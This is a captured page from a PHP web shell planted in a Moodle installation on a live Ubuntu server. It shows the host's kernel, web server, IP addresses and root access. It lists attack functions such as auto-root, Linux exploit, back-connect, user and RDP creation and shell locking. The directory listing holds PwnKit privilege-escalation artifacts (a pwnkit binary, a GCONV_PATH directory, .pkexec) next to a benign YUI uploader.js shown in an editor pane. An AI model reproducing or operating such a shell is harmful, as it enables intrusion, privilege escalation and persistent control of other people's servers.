Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
yuilib /
3.17.2 /
uploader /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
uploader-debug.js
1.71
KB
-rwxrwxrwx
uploader-min.js
442
B
-rwxrwxrwx
uploader.js
1.71
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : uploader.js
/* YUI 3.17.2 (build 9c3c78e) Copyright 2014 Yahoo! Inc. All rights reserved. Licensed under the BSD License. http://yuilibrary.com/license/ */ YUI.add('uploader', function (Y, NAME) { /** * Provides UI for selecting multiple files and functionality for * uploading multiple files to the server with support for either * html5 or Flash transport mechanisms, automatic queue management, * upload progress monitoring, and error events. * @module uploader * @main uploader * @since 3.5.0 */ /** * `Y.Uploader` serves as an alias for either <a href="UploaderFlash.html">`Y.UploaderFlash`</a> * or <a href="UploaderHTML5.html">`Y.UploaderHTML5`</a>, depending on the feature set available * in a specific browser. If neither HTML5 nor Flash transport layers are available, `Y.Uploader.TYPE` * static property is set to `"none"`. * * @class Uploader */ /** * The static property reflecting the type of uploader that `Y.Uploader` * aliases. The possible values are: * <ul> * <li><strong>`"html5"`</strong>: Y.Uploader is an alias for <a href="UploaderHTML5.html">Y.UploaderHTML5</a></li> * <li><strong>`"flash"`</strong>: Y.Uploader is an alias for <a href="UploaderFlash.html">Y.UploaderFlash</a></li> * <li><strong>`"none"`</strong>: Neither Flash not HTML5 are available, and Y.Uploader does * not reference an actual implementation.</li> * </ul> * * @property TYPE * @type {String} * @static */ var Win = Y.config.win; if (Win && Win.File && Win.FormData && Win.XMLHttpRequest) { Y.Uploader = Y.UploaderHTML5; } else if (Y.SWFDetect.isFlashVersionAtLeast(10,0,45)) { Y.Uploader = Y.UploaderFlash; } else { Y.namespace("Uploader"); Y.Uploader.TYPE = "none"; } }, '3.17.2', {"requires": ["uploader-html5", "uploader-flash"]});
Close